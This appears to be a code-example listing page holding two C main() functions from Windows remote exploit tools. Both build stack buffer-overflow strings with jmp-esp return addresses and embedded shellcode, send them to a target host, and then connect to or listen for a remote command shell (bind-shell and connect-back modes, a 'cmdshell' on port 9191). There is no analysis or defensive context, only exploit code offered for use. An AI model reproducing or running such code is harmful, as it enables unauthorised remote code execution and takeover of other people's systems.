예제 #1
0
int main(int argc, char *argv[]) {

	char opt;
	char *host, *ptr, *ip="";
	struct sockaddr_in sockadd;
	int i, i_len, ok=0, mode=0, flag=0;
	int align=ALIGN, retsize=RET_SIZE, sc_offset=SC_OFFSET;
	int target=TARGET, scsize=SC_SIZE_1, port=PORT;
	int timeout=TIME_OUT, interval=INTERVAL;
	long retaddr;

	WSADATA wsd;
	SOCKET s1, s2;

	if (argc<2) { usage(argv[0]); }

	while ((opt=getopt(argc,argv,"a:i:I:r:s:h:t:T:p:Hl"))!=EOF) {
		switch(opt) {
			case 'a':
			align=atoi(optarg);
			break;

			case 'I':
			interval=atoi(optarg);
			break;

			case 'T':
			timeout=atoi(optarg);
			break;

			case 't':
			target=atoi(optarg);
			retaddr=targets[target-1].jmpesp;
			break;

			case 'i':
			ip=optarg;
			changeip(ip);
			break;

			case 'l':
			mode=1;
			scsize=SC_SIZE_2;
			break;

			case 'r':
			retsize=atoi(optarg);
			break;

			case 's':
			sc_offset=atoi(optarg);
			break;
			
			case 'h':
			ok=1;
			host=optarg;
			sockadd.sin_addr.s_addr=inet_addr(optarg);
			break;

			case 'p':
			port=atoi(optarg);
			break;

			case 'H':
			showtargets();
			break;

			default:
			usage(argv[0]);
			break;
		}
	}

	if (!ok || (mode&&((strcmp(ip,"")==0)))) { usage(argv[0]); }

	memset(buff,NOP,BSIZE);

	ptr=buff+align;
	for(i=0;i<retsize;i+=4) {
		*((long *)ptr)=retaddr;
		ptr+=4;
	}

	if (WSAStartup(MAKEWORD(1,1),&wsd)!=0) {
		err_exit("-> WSAStartup error....");
	}

	if ((s1=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
		err_exit("-> socket() error...");
	}
	sockadd.sin_family=AF_INET;
	sockadd.sin_port=htons((SHORT)port);

	ptr=buff+retsize+sc_offset;

	if (BSIZE<(retsize+sc_offset+scsize)) err_exit("-> Bad 'sc_offset'..");

	banner();

	if (mode) {

		printf("-> 'Listening' mode...( port: %d )\n",port);

		changeport(connback, port, PORT_OFFSET_2);
		for(i=0;i<scsize;i++) { *ptr++=connback[i]; }

		do_send(host,timeout);
		Sleep(1000);

		sockadd.sin_addr.s_addr=htonl(INADDR_ANY);
		i_len=sizeof(sockadd);

		if (bind(s1,(struct sockaddr *)&sockadd,i_len)<0) {
			err_exit("-> bind() error");
		}

		if (listen(s1,0)<0) {
			err_exit("-> listen() error");
		}

		printf("-> Waiting for connection...\n");

		s2=accept(s1,(struct sockaddr *)&sockadd,&i_len);

		if (s2<0) {
			err_exit("-> accept() error");
		}

		printf("-> Connection from: %s\n\n",inet_ntoa(sockadd.sin_addr));

		resetalarm();
		doshell(s2);

	}
	else {

		printf("-> 'Connecting' mode...\n",port);

		changeport(bindport, port, PORT_OFFSET_1);
		for(i=0;i<scsize;i++) { *ptr++=bindport[i]; }

		do_send(host,timeout);
		Sleep(1000);

		printf("-> Will try connecting to shell now....\n");

		i=0;  
		while(!flag) {
			Sleep(interval*1000);
			if(connect(s1,(struct sockaddr *)&sockadd, sizeof(sockadd))<0) {
				printf("-> Trial #%d....\n",i++);
			}
			else { flag=1; }
		}

		printf("-> Connected to shell at %s:%d\n\n",inet_ntoa(sockadd.sin_addr),port);

		resetalarm();
		doshell(s1);

	}

	return 0;

}
예제 #2
0
// ***************************************************************
int main(int argc,char *argv[])
{
	WSADATA wsdata;
	int sock;
	unsigned short port = 9191;
	struct sockaddr_in target;
	unsigned long ip;
	char opt;
	int tgt_type = 0;
	char *tgt_host;

	if (argc<2) { usage(argv[0]); }

	while((opt = getopt(argc,argv,"h:t:v"))!=EOF) {
		switch(opt)
		{
			case 'h':
				tgt_host = optarg;
				snprintf(tgt_net,127, "\\\\%s", optarg);
				snprintf(ipc,127, "\\\\%s\\ipc$", optarg);
				break;
			case 't':
				tgt_type = atoi(optarg);
				if (tgt_type == 0 || tgt_type > sizeof(targets) / 8) {
					showtargets();
				}
				break;
			default:
				usage(argv[0]);
				break;
		}
	}

	printf("\n[+] Prepare exploit string\n");

	memset(expl, 0x00, sizeof(expl));
	memset(expl, 0x41, 2064);
	memcpy(&expl[2044], (unsigned char *) &targets[tgt_type-1].jmpesp, 4);
	//memcpy(&expl[2044], "BBBB", 4);
	memcpy(&expl[2064], shellcode, sizeof(shellcode));		// begin shellcode here

	memset(expl_uni, 0x00, sizeof(expl_uni));
	memset(tgt_net_uni, 0x00, sizeof(tgt_net_uni));
	mbstowcs(tgt_net_uni, tgt_net, sizeof(tgt_net));

	switch(tgt_type) {
		case 1:
		case 3:
			MultiByteToWideChar(CP_ACP, 0, expl, sizeof(expl), (unsigned short *)expl_uni,sizeof(expl_uni));
			// MultiByteToWideChar - 100 % work at XP+SP0+Rollup
			break;
		case 2:
			mbstowcs(expl_uni, expl, sizeof(expl)); // work at XP+SP1
			break;
		default:
			mbstowcs(expl_uni, expl, sizeof(expl));
			break;
	}

	beginthread(send_exp,0,NULL);

	printf("[+] Sleep at 2s ... \n");
	sleep(2000);

	if (WSAStartup(MAKEWORD(2,0),&wsdata)!=0) {
		printf("[x] WSAStartup error...\n");
		WSACleanup();
        return 1;
	}
	printf("[+] Initialize WSAStartup - OK\n");

	if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {

		printf("[x] Socket not initialized! Exiting...\n");
		WSACleanup();
        return 1;
	}
	printf("[*] Socket initialized - OK\n");

	ip=gimmeip(tgt_host);
	memset(&target, 0, sizeof(target));
	target.sin_family=AF_INET;
	target.sin_addr.s_addr = ip;
	target.sin_port=htons(port);

	printf("[+] Try connecting to %s:%d ...\n",tgt_host,port);

	if(connect(sock,(struct sockaddr *)&target, sizeof(target))!=0) {
			printf("\n[x] Exploit failed or is Filtred. Exiting...\n");
			WSACleanup();
			exit(1);
	}

	printf("[*] Connected to shell at %s:%d\n\n",inet_ntoa(target.sin_addr),port);
	cmdshell2(sock);
	closesocket(sock);
	WSACleanup();
	return 0;
}